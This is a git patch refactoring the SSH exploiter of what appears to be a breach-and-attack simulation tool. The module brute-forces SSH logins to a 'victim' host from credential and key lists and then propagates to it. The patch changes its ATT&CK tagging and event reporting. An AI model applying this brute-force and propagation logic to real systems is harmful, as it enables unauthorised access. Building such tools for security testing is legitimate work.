From e8f48085a4f64bc2cf748772eb11241eaac5ab1e Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 17:43:40 +0000 Subject: [PATCH] Agent: Use the tag properties --- monkey/infection_monkey/exploit/sshexec.py | 60 ++++++---------------- 1 file changed, 16 insertions(+), 44 deletions(-) diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index 00221edf2..b0a7b7b2b 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -2,7 +2,7 @@ import io import logging from ipaddress import IPv4Address from pathlib import PurePath -from typing import Optional +from typing import Optional, Tuple import paramiko @@ -43,13 +43,17 @@ SSH_CHANNEL_TIMEOUT = MEDIUM_REQUEST_TIMEOUT TRANSFER_UPDATE_RATE = 15 SSH_EXPLOITER_TAG = "ssh-exploiter" -EXPLOIT_TAGS = (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG) -PROPAGATION_TAGS = (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG) class SSHExploiter(HostExploiter): _EXPLOITED_SERVICE = "SSH" + def _exploiter_tags(self) -> Tuple[str, ...]: + return (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG) + + def _propagation_tags(self) -> Tuple[str, ...]: + return (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG) + def __init__(self): super(SSHExploiter, self).__init__() @@ -61,7 +65,7 @@ class SSHExploiter(HostExploiter): logger.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total) timer.reset() - def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient: + def exploit_with_ssh_keys(self, port: int) -> paramiko.SSHClient: user_ssh_key_pairs = generate_identity_secret_pairs( identities=self.options["credentials"]["exploit_user_list"], secrets=self.options["credentials"]["exploit_ssh_keys"], @@ -101,11 +105,7 @@ class SSHExploiter(HostExploiter): ) self.add_vuln_port(port) self.exploit_result.exploitation_success = True - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=True, - tags=EXPLOIT_TAGS, - ) + self._publish_exploitation_event(True) self.report_login_attempt(True, user, ssh_key=ssh_string) return ssh except paramiko.AuthenticationException as err: @@ -114,19 +114,14 @@ class SSHExploiter(HostExploiter): f"Failed logging into victim {self.host} with {ssh_string} private key: {err}" ) logger.info(error_message) - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=False, - error_message=error_message, - tags=EXPLOIT_TAGS, - ) + self._publish_exploitation_event(False, error_message=error_message) self.report_login_attempt(False, user, ssh_key=ssh_string) continue except Exception as err: logger.error(f"Unknown error while attempting to login with ssh key: {err}") raise FailedExploitationError - def exploit_with_login_creds(self, port) -> paramiko.SSHClient: + def exploit_with_login_creds(self, port: int) -> paramiko.SSHClient: user_password_pairs = generate_identity_secret_pairs( identities=self.options["credentials"]["exploit_user_list"], secrets=self.options["credentials"]["exploit_password_list"], @@ -158,23 +153,14 @@ class SSHExploiter(HostExploiter): logger.debug("Successfully logged in %r using SSH. User: %s", self.host, user) self.add_vuln_port(port) self.exploit_result.exploitation_success = True - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=True, - tags=EXPLOIT_TAGS, - ) + self._publish_exploitation_event(True) self.report_login_attempt(True, user, current_password) return ssh except paramiko.AuthenticationException as err: error_message = f"Failed logging into victim {self.host} with user: {user}: {err}" logger.debug(error_message) - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=False, - error_message=error_message, - tags=EXPLOIT_TAGS, - ) + self._publish_exploitation_event(False, error_message=error_message) self.report_login_attempt(False, user, current_password) ssh.close() continue @@ -195,7 +181,6 @@ class SSHExploiter(HostExploiter): except FailedExploitationError as err: self.exploit_result.error_message = str(err) logger.error(str(err)) - return self.exploit_result if self._is_interrupted(): self._set_interrupted() @@ -204,15 +189,9 @@ class SSHExploiter(HostExploiter): try: self._propagate(ssh) except FailedExploitationError as err: - ssh.close() self.exploit_result.error_message = str(err) logger.error(self.exploit_result.error_message) - self._publish_propagation_event( - target=self.host.ip_addr, - propagation_success=False, - error_message=self.exploit_result.error_message, - tags=PROPAGATION_TAGS, - ) + self._publish_propagation_event(False, error_message=self.exploit_result.error_message) except RuntimeError as err: error_message = str(err) self.exploit_result.error_message = error_message @@ -221,7 +200,7 @@ class SSHExploiter(HostExploiter): ssh.close() return self.exploit_result - def _exploit(self, port) -> paramiko.SSHClient: + def _exploit(self, port: int) -> paramiko.SSHClient: try: ssh = self.exploit_with_ssh_keys(port) except FailedExploitationError: @@ -270,14 +249,7 @@ class SSHExploiter(HostExploiter): ) self.exploit_result.propagation_success = True - - self._publish_propagation_event( - target=self.host.ip_addr, - propagation_success=True, - tags=PROPAGATION_TAGS, - ) - - ssh.close() + self._publish_propagation_event(True) self.add_executed_cmd(cmdline) except Exception as exc: